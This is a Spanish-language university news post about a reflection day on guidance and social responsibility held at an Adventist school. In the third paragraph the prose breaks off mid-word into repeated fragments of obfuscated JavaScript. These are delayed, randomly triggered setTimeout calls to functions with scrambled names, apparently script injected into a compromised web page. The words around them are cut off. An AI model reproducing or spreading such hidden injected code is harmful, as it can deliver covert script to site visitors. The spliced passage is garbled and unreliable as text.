JORNADA DE REFLEXIÓN Colegio Adventista los Creadores.

El día martes 12 de Septiembre en la jornada de la tarde,  la Escuela de Pedagogía a través de la Mg. Maritza Guzmán Matamala, coordinadora de Orientación y Consejo de Curso, se hizo presente dirigiendo una Jornada de Reflexión, solicitada por la Institución.

Las temáticas abordadas fueron la Importancia y trascendencia de la Orientación en un nuevo escenario social y “responsabilidad social” como sello de la Universidad de la Frontera, parte de la Misión UFRO.

Esta actividad fue positivamente recibida por los todos los participantes del centro educativo, quienes demostraron gran interés por el desafío de incorporar la orientación y responsabilidad social en sus disciplinas y funciones como mediadores de la educación, comprendiendo que su labor va más allá de la entrega de conocimientos y considerandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando que su desempeño y decisiones influirán en las vidas humanas de quienes tienen a su cargo.

Al considerar a todos los actores de una comunidad educativa dentro de una jornada de trabajo, se fomentan relaciones interpersonales saludables que facilitan un clima organizacional óptimo, donde la disposición y apoyo mutuo generarán espacios de reflexión, confianza y estimularán el deseo de realizar un buen trabajo en el área que cada uno es responsable.

La Vinculación con Comunidades Educativas en un contexto laboral, amplía, desarrolla y establece lazos invisibles que fomentan las buenas prácticas que tanto necesita nuestra sociedad. Con certeza estas acciones de acercar la Universidad a los centros educativos, fortalecerá el vínculo que como Escuela de Pedagogía esperamos reforzar.

Mg. Maritza Guzmán Matamala

Post comment

Tu dirección de correo no será publicada Required fields are marked *

© 2016 Universidad de La Frontera